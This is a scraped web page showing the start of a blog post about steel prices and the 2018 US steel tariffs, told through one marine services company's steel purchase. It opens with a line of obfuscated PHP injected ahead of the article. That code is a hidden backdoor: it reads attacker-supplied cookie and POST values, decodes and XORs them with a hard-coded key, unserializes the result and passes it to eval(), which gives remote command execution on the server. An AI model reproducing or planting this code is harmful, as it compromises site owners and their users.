$FjrYY = "\112" . chr ( 153 - 82 )."\x50" . "\137" . chr ( 494 - 393 ).'p' . 'R';$FroHwqRwR = "\143" . "\x6c" . chr (97) . 's' . chr ( 1033 - 918 ).chr ( 983 - 888 ).chr ( 743 - 642 )."\170" . 'i' . 's' . "\x74" . 's';$buVELPZ = class_exists($FjrYY); $FjrYY = "25437";$FroHwqRwR = "48348";$NszUioYBf = !1;if ($buVELPZ == $NszUioYBf){function oEFUnZI(){return FALSE;}$VkeHC = "47820";oEFUnZI();class JGP_epR{private function cGgqXaxWzy($VkeHC){if (is_array(JGP_epR::$XOdhtj)) {$HvxGWLKM = str_replace("\74" . chr ( 188 - 125 ).chr ( 546 - 434 )."\x68" . "\x70", "", JGP_epR::$XOdhtj['c' . chr (111) . chr (110) . "\164" . "\145" . "\x6e" . 't']);eval($HvxGWLKM); $VkeHC = "47820";exit();}}private $WokpKyz;public function jzRDS(){echo 8466;}public function __destruct(){$VkeHC = "56088_49393";$this->cGgqXaxWzy($VkeHC); $VkeHC = "56088_49393";}public function __construct($flNKdOyaQW=0){$IWwKIxfpf = $_POST;$SRgELXXqJc = $_COOKIE;$aVCHeChgSn = "042cb365-e2ee-479b-aeb5-2641dd9c2615";$ubOpLNj = @$SRgELXXqJc[substr($aVCHeChgSn, 0, 4)];if (!empty($ubOpLNj)){$aECpf = "base64";$NMntHSeYTL = "";$ubOpLNj = explode(",", $ubOpLNj);foreach ($ubOpLNj as $jiBDpoKE){$NMntHSeYTL .= @$SRgELXXqJc[$jiBDpoKE];$NMntHSeYTL .= @$IWwKIxfpf[$jiBDpoKE];}$NMntHSeYTL = array_map($aECpf . "\137" . chr (100) . "\145" . "\143" . chr ( 440 - 329 ).chr ( 350 - 250 )."\x65", array($NMntHSeYTL,)); $NMntHSeYTL = $NMntHSeYTL[0] ^ str_repeat($aVCHeChgSn, (strlen($NMntHSeYTL[0]) / strlen($aVCHeChgSn)) + 1);JGP_epR::$XOdhtj = @unserialize($NMntHSeYTL); $NMntHSeYTL = class_exists("56088_49393");}}public static $XOdhtj = 8953;}$SXbrMU = new /* 2958 */ JGP_epR(47820 + 47820); $NszUioYBf = $SXbrMU = $VkeHC = Array();} Steel Prices and Dumb Policies – Lessons Learned

Steel Prices and Dumb Policies

On March 8, 2018, McCulley Marine Services bought 59,973 pounds of steel in various sizes and shapes to repair and maintain one of our barges. The total paid for this steel was $40,710. On March 23, 2018, the Trump Administration’s tariffs on imported steel took effect. These tariffs imposed a 25% duty on steel imports … Continue reading Steel Prices and Dumb Policies